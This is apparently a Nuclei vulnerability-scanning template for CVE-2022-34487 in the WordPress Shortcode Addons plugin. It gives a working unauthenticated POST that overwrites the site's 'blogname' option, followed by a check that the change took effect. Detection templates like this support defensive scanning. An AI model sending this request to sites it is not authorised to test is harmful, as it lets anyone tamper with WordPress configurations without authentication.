id: CVE-2022-34487 info: name: ShortCode Addons - Unauthenticated Options Update author: Sourabh-Sahu severity: critical description: | WordPress plugin Shortcode Addons <= 3.0.2 contains an unauthenticated arbitrary option update caused by insufficient access controls in the plugin, letting attackers modify options without authentication. impact: | Attackers can modify plugin options arbitrarily, potentially leading to site defacement, data tampering, or further exploitation. remediation: | Update to the latest version of Shortcode Addons plugin. reference: - https://wpscan.com/vulnerability/c8dd91d5-fdc4-4852-9823-6d0047b214fe/ - https://patchstack.com/database/vulnerability/shortcode-addons/wordpress-shortcode-addons-plugin-3-0-3-unauthenticated-arbitrary-option-update-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2022-34487 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-34487 cwe-id: CWE-264 epss-score: 0.484 epss-percentile: 0.97822 cpe: cpe:2.3:a:oxilab:shortcode_addons:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 tags: cve,cve2022,wp,wp-plugin,wordpress,shortcode-addons,vkev flow: http(1) && http(2) variables: rand: "{{randstr}}" http: - raw: - | POST /wp-json/ShortCodeAddonsUltimate/v2/addons_settings HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22{{rand}}%22%7D matchers: - type: dsl internal: true dsl: - status_code == 200 - contains(body, 'oxi-confirmation-success') condition: and - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - contains_all(body, rand, "/wp-") - status_code == 200 condition: and # digest: 490a0046304402202dd8e852a7b594394144ce2f0eeeeaa52a891b98014014a26b838259b0ba6eef02203cd642bd2eb98d12528614b35569bcd6975c528706cfd4e1be04876097adba35:922c64590222798bb761d5b6d8e72950